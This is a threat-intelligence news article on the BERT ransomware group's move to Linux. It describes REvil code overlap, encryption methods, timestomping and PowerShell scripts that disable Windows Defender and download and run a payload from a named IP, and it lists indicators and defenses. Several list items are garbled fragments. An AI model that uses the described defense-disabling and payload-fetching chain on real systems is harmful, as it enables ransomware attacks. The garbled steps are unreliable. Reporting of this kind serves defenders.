First observed in March 2025 targeting Windows systems, the BERT ransomware group escalated its operations in May 2025 by launching attacks on Linux machines.
Analysis of two Linux-focused ELF samples reveals an 80% codebase overlap with Sodinokibi (Revil) ransomware, a notorious group linked to Russian cybercriminals.
The Linux variants employ sophisticated encryption methods, including AES, RC4 PRGA, Salsa20, and ChaCha20 algorithms, as well as Base64 encoding, to obfuscate payloads.
Unlike its Windows counterpart, which appends unique extensions like “.encryptedbybert3,” the Linux version utilizes AWK commands to query system registries, suggesting a hybrid approach that combines old and new tactics.
Security researchers note that BERT’s Linux exploits are designed for stealth, with timestamps manipulated to future dates (e.g., 2047, 2076) to evade detection.
One sample (MD5: 00fdc504be1788231aa7b7d2d1335893) retained a legitimate May 20, 2025, timestamp, confirming recent activity.
The ransomware’s PowerShell scripts further weaken systems by disabling Windows Defender, firewalls, and User Account Control (UAC) before deploying payloads from a Swedish IP (185.100.157.74) linked to Russian firm Edinaya Set Limited.
Multi-Stage Attacks: PowerShell Scripts and Russian Infrastructure
BERT’s attack chain begins with a malicious PowerShell script (start.ps1) hosted on the same server as its payloads. The script performs three critical actions:
WinDefend and Sense.payload.exe from http://185.100.157.74 and executes it.The use of Russian infrastructure aligns with historical ransomware trends, where threat actors leverage local providers to blend into “bad traffic.”
The Linux payloads, while borrowing heavily from Revil, introduce novel encryption layers, making decryption nearly impossible without the attackers’ RSA keys.
Global Impact and Mitigation Strategies
BERT has targeted organizations in the U.S., UK, Malaysia, Taiwan, Colombia, and Turkey, with the service and manufacturing sectors most affected.
Victims’ data is leaked on a Tor-based site (wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion) in zipped archives labeled “part1,” “part2,” etc. Negotiations occur via the privacy-focused Sessions app, with ransoms demanded in Bitcoin (e.g., 1.5 BTC for a recent victim).
Key Recommendations for Defense:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender.185.100.157.74 and inspect PowerShell scripts for privilege escalation attempts.The BERT group’s blend of recycled Revil code and custom .NET-based Windows tools underscores the evolving threat of cross-platform ransomware.
As investigations continue, organizations are urged to prioritize patch management and network segmentation to limit lateral movement.
00fdc504be1788231aa7b7d2d1335893 (timestomped sample)newcryptor.exe, ESXDSC04_bert11, note.txt (ransom note)The BERT group’s shift to Linux underscores the critical need for cross-platform threat hunting. With its REvil-inspired code and adaptive infrastructure, organizations must adopt proactive defenses to mitigate this dual-OS threat.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…